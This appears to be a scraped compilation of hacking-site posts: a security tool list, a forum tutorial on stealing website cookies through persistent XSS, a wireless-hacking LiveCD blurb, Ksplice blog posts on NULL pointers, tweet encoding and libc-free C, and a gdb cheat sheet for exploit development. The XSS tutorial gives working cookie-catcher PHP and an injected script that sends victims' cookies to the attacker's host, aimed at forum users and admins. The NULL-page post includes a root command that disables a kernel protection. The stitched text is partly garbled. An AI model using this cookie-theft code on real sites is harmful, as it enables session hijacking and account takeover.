This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits

11.THC Hydra:
~A Fast network authentication cracker which supports many different services~
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

You can get THC Hydra from HERE

12. Ettercap :
In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

[Tut] How to Hack a Website by XSS

Hello Guys !

I am going teach you How to hack a website through XSS (Persistent Cross Site Scripting).

I wrote it because i didnt find a Nice Tut to explain XSS. I didnt added much pics as I dont want to hack an website for just a tut. But this is pretty much easy and you will learn without much difficulties.

" Something about XSS " :-

XSS is basically using java scripts in different forms to get internet details of a user’s profile of respective website. With the help of XSS we can steal the cookies of the owner of the website.
XSS is a very large concept and your success rate depends on your imagination and experience.
Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something.
Where XSS is just understanding the way we can use java scripts,
and the vulnerabilities of the website may be at the different places for executing your java scripts.

So I could say that XSS or Cross site scripting means to take advantage of web applications that takes the user input but doesn’t filter them properly. This allows an attacker to inject HTML or other codes to get some hidden information out of it. Most common information that people look with
XSS is Cookies. The cookies are used to maintain user authentication of respective website.

" XSS " :-

* Search terms :- Almost all of the websites have search boxes where you can try to search something from the website.
In the search box you can type your malicious script and check the vulnerability.

* Text Boxes :- If you see any type of text boxes in the website which will basically let you
put some query in it.

So we are trying to find a place where we can write something, which will later be shown in the same webpage.

" Types of XSS " :-

There are 2 types of XSS vulnerability.

1. Persistent Cross Site Scripting

2. Non-persistent Cross site Scripting.

Lets go for Persistent Cross Site Scripting.

" Persistent Cross Site Scripting " :-

Persistent Cross Site Scripting vulnerability would take place if the malicious code which you inject would be permanent on respective website. To understand it better. I will give u a little example.

Suppose if you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed which wouldn’t have been filtered due to lacks in the security of the website and user’s or admin’s cookies would be sent to you on a “cookie catcher”, which would be a .php file stored on your own website. This website could be a free hosting website.

Lets Suppose we have
Its just for Example and actually example 's website Doesnt exist ! =P

" Checking for Vulnerability " :-

Now, the very first thing we will have to see is a place where we can input some text,
and later on that should be displayed.

For example of secure sites,in, we have a search bar, so in the search bar lets
put “test” and hit enter.
You will see that it will say “Sorry, but no results were returned using the query information you provided.
Please redefine your search terms and try again.”.
But you should notice here that it doesn’t say “No search results found for “test”.
So it means that it is not Echoing the word that we put into the search bar.
So there is no chance to exlpoit the search bar of Hackforums.

" Testing Java Scripts " :-

Now, since we know that the website is vulnerable to XSS.
We will try to run a small java script into the website.

script type="text/javascript" alert('test') script

So what this will do is, it will popup a little alert box saying “test” on it.
And if it does that, it means that it accepts the javascripts input as well.

Remember : you can even use -
script type="text/javascript" alert('your Name') script

It will show something like -

Once, you’re done just clikc on the "Ok" or “Preview” button at the bottom.
And in the next page you should get a popup that says “test”.

" Finding Cookies " :-

Now, since we have seen that the website IS accepting javascript inputs and executing them on the next page, lets try to do something else with the javascripts. First of all, i want you guyz to understand what are cookies and where do you find them. Type the following command into the address bar of your web browser.


As soon as you type that command and hit enter on the keyboard, it should make some popup which will show you your cookies of respective website. Make sure you are logged in to check your cookies. As i said before, cookies are the things which handles the sessions information and logs you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS, we find some way to get those cookies sent to us.

Now, lets try to find a way to get these cookies sent to us with the help of the java scripts.

" Creating Cookie Catcher " :-

Cookie catcher is a file, which you will have to upload to some of your web hosting account, and change its permission to 777 so it can grab the cookies. Copy the following code and paste it to your notepad.

$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Referer: ‘.$referer.’

header (“Location:”);

Just a little elaboration about the script. The first statement will get the cookies.
Second statement will get the IP. Third statement will get the referer. T
he last link would send the victim to “”.
To make it a little less suspecious, you can change the link to,
so the victim wouldnt see anything unusual. so on. Copy the given code and put it into a notepad.
Save it as something.php. Just make sure that you change the format to “.php”.

You’ll need a free webhosting account where you can upload the file. I personally use “”, so create an account there and upload this php file. Make sure that you change its permissions to “777″.

" Testing Cookie Catcher " :-

Now, as you guyz have seen that we have been executing a little script in that page which brings
up an alert bar, lets go a little advanced. Lets try to send our own cookies to our cookie catcher.

script document.location=”link-of-your-cookie-catcher?c=” + document.cookies script

" Elaboration on the script " :-

Document.Location will change the location of the website and we have set it equals to the
link of your cookies catcher and “?c=” we’ve added because its a get statement.
“+ document.cookies” means to visit your cookie catcher with the cookies of your victim’s site
so it can record it.

Now, here is the second

Lets try if it works or not. I am going to using the script that I have shown in the
“Something” page of

Now, If you click on Ok or Preview, it will take you to OR whatever you have changed
the link to in the Cookie Catcher. Now, lets login back to account, and you will
notice another “cookies.html” file has been added, automatically.

Now, if you open up the new automatically uploaded file, you will notice some cookies insde that file.

Cookie: undefined
Date and Time: 3 April, 2010, 2:03 am

Note: This will look a little different from actual cookies, because when i stole these,
i wasnt logged in, so if a user is logged in, then you should get a little different from this.

Now, Get “cookie editor” addon of mozilla firefox.

" Stealing Actual Cookies " :-

Till now, we were our own victim, we were trying to steal our own cookies to make sure this works.
Now, lets try to get some actual victims. In the site, you may have to PREVIEW the post first and
then submit it. So the javascript is getting executed whenever you preview it, so we can not
submit it because the script is already executed. And may be in other sites, you can directly
submit the post, so the moment someone opens it, you will get the cookies.

Whenever you put the script in the “NAME” and something something in other fields, you click on preview,
QUICKLY, before it redirects you to the website as described in your cookie stealer,
the URL will change to something else for a moment.
Thats what you will have to copy. What i copied was this.

And then , you just give this link to your victim, as soon as they click ON it, you get the cookies.

It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link,
you will actually submit the report. So as soon as someone reads it you get the cookies. [cyclone]


Wireless Hacking LiveCD FBI 2010 | 630 MB

An edited and slightly updated version of the popular LiveCD for working with wireless networks. Based on Ubuntu, provides a graphical interfeys.Disk boot, there is a script to be installed on the PC hard drive or a virtual machine (VirtualPC is not supported). Integrated over 50 tools to work with the network – scanners, sniffers, password crackers, and so on. utility.Krome of this – a full Linuhe sustainable yadrom.Posle installed on the hard disk system can be Russified, supplemented, adjusted to taste vladeltsa.V addition to the Back Track 4 – a very powerful set of tools to work with networks in the first place – besprovodnymi.Imeetsya a decent set of drivers for many types adapterov.V inete in various models has been known since 2007, the popular view that his creation had to do with the FBI.
RAM] 256 Mb
CPU] 800 GHz
HDD] 4 Gb

CRC32: 0D504602
MD5: D6E4E9DBCE86DC165DCF24808 1E4F421
SHA-1: 489BE5B921211986F47EECA42 EE516275BE94267

Year: 2010
Developer: GNU
Type: Hack & Tools
Medicine: Not required
Size: 630 MB


Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we’re always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.
If you’ve ever programmed in C, you’ve probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded “Segmentation Fault”. Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today’s installment, we’ll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I’ll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!
What’s in a pointer?
There’s nothing fundamentally magical about pointers in C (or assembly, if that’s your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer’s memory. We can write a C program to print out a random pointer:
int main(int argc, char **argv) {
printf("The argv pointer = %d\n", argv);
return 0;

Which, if you run it on my machine, prints:
The argv pointer = 1680681096
(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that’s just a notational thing. They’re still just integers.)
NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it’s just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.
But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you’re browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It’s actually even worse than that: a bug in IE can even take down the entire operating system.
This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other’s memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program’s address space to different pieces of physical memory.

One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.
Because each application has its own address space, however, it is free to do with it as it wants. For instance, you’re welcome to declare that NULL should be a valid address in your application. We refer to this as “mapping” the NULL page, because you’re declaring that that area of memory should map to some piece of physical memory.
On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:
void *mmap(void *addr, size_t length, int prot, int flags,
int fd, off_t offset);
Let’s go through those arguments in order (All of this information comes from the man page):
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
The length of the region the application wants to map. Memory can only be mapped in increments of a “page”, which is 4k (4096 bytes) on x86 processors.
Short for “protection”, this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process’s address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we’re going pass MAP_ANONYMOUS in flags, which indicates that we don’t want to map a file, and fd is irrelevant.
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.
If we just want to be able to read and write the NULL pointer, we’ll want to set addr to 0 and length to 4096, in order to map the first page of memory. We’ll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we’ll set them to -1 and 0 respectively.
Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!
(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you’ll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

int main() {
int *ptr = NULL;
if (mmap(0, 4096, PROT_READ|PROT_WRITE,
perror("Unable to mmap(NULL)");
fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
return 1;
printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
*ptr = 17;
printf("Now it's: %d\n", *ptr);
return 0;
Next time, we’ll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel’s address space. And, I’ll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!
The 1st International Longest Tweet Contest
Posted in Programming on March 25th, 2010 by Keith Winstein – 30 Comments
How much information is in a tweet?
There are a lot of snarky answers to that. Let’s talk mathematically, where information is measured in bits: How many bits can be expressed in a tweet?
It’s kind of fun to try to figure out how to cram in the most information. Our current in-house record is 4.2 kilobits (525 bytes) per tweet, but this can definitely be bested. Twitter’s 140-character limit has been under assault for some time, but nobody has decisively anointed a winner.
To that end, announcing the 1st International Longest Tweet Contest, along the lines of the International Obfuscated C Code Contest. The goal: fit the most bits of information into a tweet. There will be glorious fame and a T-shirt for the winner. More on that later. But first, a dialog:
Ben Bitdiddle: How big can a tweet get? SMS is limited to 160 characters of 7-bit ASCII, or 1,120 bits. Since Twitter based their limit on SMS but with 20 characters reserved for your name, a tweet is probably limited to 140 × 7 = 980 bits.
Alyssa P. Hacker: Not quite — despite its SMS roots, Twitter supports Unicode, and the company says its 140-character limit is based on Unicode characters, not ASCII. So it’s a lot more than 980 bits.
Ben: Ok, Unicode is a 16-bit character set, so the answer is 140 × 16 = 2,240 bits.
Alyssa: Well, since that Java documentation was written, Unicode has expanded to cover more of the world’s languages. These days there are 1,112,064 possible Unicode characters (officially “Unicode scalar values”) that can be represented, including in the UTF-8 encoding that Twitter and most of the Internet uses. That makes Unicode about 20.1 bits per character, not 16. (Since log2 1,112,064 ≈ 20.1.)
Ben: Ok, if each character can take on one of 1,112,064 possible values, we can use that to figure out how many total different tweets there can ever be. And from that, we’ll know how many bits can be encoded into a tweet. But how?
Alyssa: It’s easy! We just calculate the total number of different tweets that can ever be received. The capacity of a tweet, in bits, is just the base-2 logarithm of that number. According to my calculator here, 1,112,064 to the 140th power is about 28.7 quattuordecillion googol googol googol googol googol googol googol googol. That’s the number of distinct 140-character messages that can be sent. Plus we have to add in the 139-character messages and 138-character messages, etc. Taking the log, I get 2,811 bits per tweet.
Ben: We’d get almost the same answer if we just multiplied 20.1 bits per character times 140 characters. Ok, 2.8 kilobits per tweet.
Alyssa: I just discovered a problem. There aren’t that many distinct tweets! For example, I can’t tell the difference between the single character ‘<’ and the four characters ‘<’. I also can’t send a tweet that contains nothing but some null characters. So we have to deflate our number a little bit. It’s tricky because we don’t know Twitter’s exact limitations; it’s a black box.
Ben: But the answer will still be roughly 2.8 kilobits. Can we do better?
Alyssa: By golly, I think we can! Turns out Unicode is basically identical to an international standard, called the Universal Multi-Octet Coded Character Set, known as UCS or ISO/IEC 10646. But the two standards weren’t always the same — in the 90s, there was a lot of disagreement between the computer companies who backed Unicode and proposed a simple 16-bit character set, and the standards mavens behind UCS, who wanted to accommodate more languages than 65,536 characters would allow. The two sides eventually compromised on the current 20.1-bit character set, but some historical differences still linger between the two “official” specifications — including in the definition of the UTF-8 encoding that Twitter uses. Check this out:

Alyssa: Although Unicode’s UTF-8 can only encode the 1,112,064 Unicode scalar values, UCS’s version of UTF-8 is a lot bigger — it goes up to 31 bits!
Ben: So, when Twitter says they use UTF-8, which version are they using? Unicode, or UCS?
Alyssa: Hmm, that’s a good question. Let’s write a program to test. I’ll send Twitter a really big UCS character in UTF-8, represented in octal like this. This is way outside the bounds of well-formed Unicode.
$ perl -Mbytes -we 'print pack "U", (2**31 - 5)' | od -t o1
0000000 375 277 277 277 277 273

Ben: Hey, that kind of worked! When we fetch it back using Twitter’s JSON API, we get this JSON fragment:

Alyssa: It’s the same thing we sent! The character (really an unassigned code position) is represented in UTF-8, in octal with backslashes in ASCII. That means Twitter “characters” are actually 31 bits, not 20.1 bits. The capacity of a tweet is actually a lot bigger than the 2.8 kilobits we calculated earlier.
Ben: Should we worry that the text only shows up in the JSON API, not XML or HTML, and these high characters only last a few days on Twitter’s site before vanishing?
Alyssa: Nope. As long as we had this exchange in our conversation, people on the Internet won’t complain about those issues.
Using Alyssa’s insight that Twitter actually supports 31-bit UCS characters (not just Unicode), we can come up with a simple program to send 4.2-kilobit tweets using only code positions that aren’t in Unicode. That way there’s no ambiguity between these crazy code positions, which Twitter represents as backslashed octal, and legitimate Unicode, which Twitter sends literally. These tweets have a text field that’s a whopping 3,360 bytes long — but in ASCII octal UTF-8, so they only represent 525 bytes of information in the end.
The sender program reads the first 525 bytes of standard input or a file, slices it into 30-bit chunks, and sends it to Twitter using 31-bit UCS code positions. The high bit of each character is set to 1 to avoid ever sending a valid Unicode UTF-8 string, which Twitter might treat ambiguously. It outputs the ID of the tweet it posted. You’ll have to fill in your own username and password to test it.
The receiver program does the opposite — give it an ID on the command line, and it will retrieve and decode a “megatwit” encoded by the sender.
Here’s an example of how to use the programs and verify that they can encode at least one arbitrary 4,200-bit message:
$ dd if=/dev/urandom of=random.bits bs=525 count=1
1+0 records in
1+0 records out
525 bytes (525 B) copied, 0.0161392 s, 32.5 kB/s
$ md5sum random.bits
a7da09e59d1b6807e78aac7004e6ba41 random.bits
$ ./megatwit-send < random.bits
$ ./megatwit-get 11037181699 | md5sum
a7da09e59d1b6807e78aac7004e6ba41 -

But this is just the start -- we're not the only ones interested in really long tweets. (Structures, strictures...) Others have found an apparent loophole in how Twitter handles some URLs, allowing them to send tweets with a text field up to 532 bytes long (how much information can be coded this way isn't clear). Maxitweet has come up with a clever way to milk the most out of 140 Unicode characters without requiring a decoder program, at least at its lower compression levels. There are definitely even better ways to cram as many bits as possible into a tweet.
So here is the challenge for the 1st International Longest Tweet Contest:
Come up with a strategy for encoding arbitrary binary data into a single tweet, along the lines of the sample programs described here.
Implement a sender and receiver for the strategy in a computer programming language of your choice. We recommend you choose a language likely to be runnable by a wide variety of readers. At your option, you may provide a Web site or other public implementation for others to test your coding scheme with arbitrary binary input.
Write a description, in English, for how your coding scheme works. Explain how many bits per tweet it achieves, and justify your calculation. The explanation must be convincing because it is intractable to prove conclusively that a certain capacity is achievable, even if a program successfully sends and receives many test cases.
Send your entry, consisting of #2 and #3, to before Sunday, April 11, 2010, 23h59 UTC.
Based on the English explanations of the coding schemes (#3), we'll select finalists from among the entrants. In mid-April, we'll post the finalists' submissions on the blog. In the spirit of Twitter, we'll let the community assess, criticize, test, and pick apart the finalists' entries.
Based on the community's feedback, we'll choose at least one winner. This will generally be the person whose scheme for achieving the highest information encoded per tweet is judged most convincing.
The winner will receive notoriety and fame on this blog, and a smart-looking Ksplice T-shirt in the size of your choice. You will be known the world over as the Reigning Champion of the International Longest Tweet Contest until there is another contest. Legally we can't promise this, but there's a chance Stephen Colbert will have you on as a result of winning this prestigious contest.
By entering the contest, you are giving Ksplice permission to post your entry if you are selected as a finalist. The contest is void where prohibited. The rules are subject to change at our discretion. Employees of Ksplice aren't eligible because they already have T-shirts. Judging will be done by Ksplice in its sole discretion.
That's it. Happy tweeting!
Hello from a libc-free world! (Part 1)
Posted in computer architecture on March 16th, 2010 by Jessica McKellar – 104 Comments
As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.
This should be easy, right?
This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.
Here’s our basic Hello World program:
jesstess@kid-charlemagne:~/c$ cat hello.c

int main()
printf("Hello World\n");
return 0;

Let’s compile it and get a bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.
So let’s stop using it. We won’t use printf so we can get rid of our include file:
jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
char *str = "Hello World";
return 0;
Recompiling and checking the bytecount:
jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!
The problem is that gcc is still using standard library startup files when linking. Want proof? We’ll compile with -nostdlib, which according to the gcc man page won’t “use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker”.
jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it’s just a warning; let’s check it anyway:
jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)…
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

…at the expense of segfaulting when it runs. Hrmph.
For fun, let’s get our program to be actually runnable before digging into the assembly.
So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you’re using libc?
From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):
# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'
This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program’s main:
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
and down the rabbit hole we go.
So that’s what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as “set up a bunch of stuff for libc and then call main”, and since we don’t care about libc, let’s just export our own _start symbol that just calls main and link against that:
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

call main
Compiling and running with our stub _start assembly file:
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let’s compile with debugging information and take a look in gdb. We’ll set a breakpoint at main and step through until the segfault:
jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4 {
(gdb) step

Breakpoint 1, main () at helloint.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()
Wait, what? Why are we running through main twice? …It’s time to look at the assembly:
jesstess@kid-charlemagne:~/c$ objdump -d hello

hello: file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00 callq 4000f0
4000ed: 90 nop
4000ee: 90 nop
4000ef: 90 nop

00000000004000f0 :
4000f0: 55 push %rbp
4000f1: 48 89 e5 mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40 movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00 mov $0x0,%eax
400101: c9 leaveq
400102: c3 retq

D’oh! Let’s save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.
Literally. After the return from callq, push 1, the syscall number for SYS_exit, into %eax, and because we want to say that we’re exiting cleanly, put a status of 0, SYS_exit’s only argument, into %ebx. Then make the interrupt to drop into the kernel with int $0x80.
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

call main
movl $1, %eax
xorl %ebx, %ebx
int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.
Hello from a libc-free world!
Stay tuned for Part 2, where we’ll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.

How to use gdb for vuln developement

* Start gdb:

[code]gdb 'executable-file'
gdb ./vuln // example

gdb `executable-file` `core-file`
gdb ./vuln core // example

If program segfaults and no core image generated do something like:
hack@exploit:~ > ulimit -c 9999

* Attach running process:

[code]// launch gdb
hack@exploit:~ > gdb
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux".
(gdb) attach 'pid'
(gdb) attach 1127 // example

* Search anything in memory
(gdb) x/d or x 'address' show dezimal
(gdb) x/100s 'address' show next 100 dezimals
(gdb) x 0x0804846c show dezimal at 0x0804846c
(gdb) x/s 'address' show strings at address
(gdb) x/105 0x0804846c show 105 strings at 0x0804846c
(gdb) x/x 'address' show hexadezimal address
(gdb) x/10x 0x0804846c show 10 addresses at 0x0804846c
(gdb) x/b 0x0804846c show byte at 0x0804846c
(gdb) x/10b 0x0804846c-10 show byte at 0x0804846c-10
(gdb) x/10b 0x0804846c+20 show byte at 0x0804846c+20
(gdb) x/20i 0x0804846c show 20 assembler instructions at address

* Search shellcode or return address or anything else on stack:
(gdb) break 'your function name or address'
(gdb) break main // example
Breakpoint 1 at 0x8048409
(gdb) run
Starting program: /home/hack/homepage/challenge/buf/basic

Breakpoint 1, 0x8048409 in main ()
(gdb) x/1000s 'address' // Print 1000 strings at address
(gdb) p $esp // Show esp register
$2 = (void *) 0xbffff454
(gdb) x/1000s $esp // Search 1000 strings at $esp address.
(gdb) x/1000s $esp-1000 // Search 1000 strings at $esp register
// - 1000.
(gdb) x/1000s 0xbffff4b4 // Search 1000 strings at 0xbffff4b4

* Listen all sections of executable file:
(gdb) maintenance info sections // or
(gdb) mai i s

Exec file:
`/home/hack/homepage/challenge/buf/basic', file type elf32-i386.
0x080480f4->0x08048107 at 0x000000f4: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048108->0x08048128 at 0x00000108: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048128->0x08048158 at 0x00000128: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048158->0x080481c8 at 0x00000158: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
0x080481c8->0x08048242 at 0x000001c8: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
0x08048242->0x08048250 at 0x00000242: .gnu.version ALLOC LOAD READONLY DATA


* Break at address
(gdb) disassemble main
Dump of assembler code for function main:
: push %ebp
0x8048401 : mov %esp,%ebp
0x8048403 : sub $0x408,%esp
0x8048409 : add $0xfffffff8,%esp
0x804840c : mov 0xc(%ebp),%eax
0x804840f : add $0x4,%eax
0x8048412 : mov (%eax),%edx
0x8048414 : push %edx
0x8048415 : lea 0xfffffc00(%ebp),%eax

(gdb) break *0x8048414 // example
Breakpoint 1 at 0x8048414
(gdb) break main // example
Breakpoint 2 at 0x8048409

* Delete breakpoints
(gdb) delete breakpoints // or
(gdb) d b
Delete all breakpoints? (y or n) y

* Search anything in heap, bss, got, ...:
(gdb) maintanance info sections

0x08049570->0x08049588 at 0x00000570: .bss ALLOC
0x00000000->0x00000654 at 0x00000570: .stab READONLY HAS_CONTENTS
0x00000000->0x00001318 at 0x00000bc4: .stabstr READONLY HAS_CONTENTS
0x00000000->0x000000e4 at 0x00001edc: .comment READONLY HAS_CONTENTS
0x08049588->0x08049600 at 0x00001fc0: .note READONLY HAS_CONTENTS

(gdb) x/1000s 0x08049600 // print strings heap
(gdb) x/1000s 0x08049570 // print strings bss section

* show registers (Very useful for stack exploits)
(gdb) break main
Breakpoint 7 at 0x8048409
(gdb) r

Starting program: /home/hack/homepage/challenge/buf/basic

Breakpoint 7, 0x8048409 in main ()
(gdb) info registers
eax 0x1 1
ecx 0x8048298 134513304
edx 0x8048400 134513664
ebx 0x400f6618 1074751000
esp 0xbffff4b4 0xbffff4b4
ebp 0xbffff8bc 0xbffff8bc
esi 0x4000aa20 1073785376
edi 0xbffff924 -1073743580
eip 0x8048409 0x8048409
eflags 0x286 646
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0

* Get dynamic function pointer (Useful for return into libc exploits)
(gdb) break main
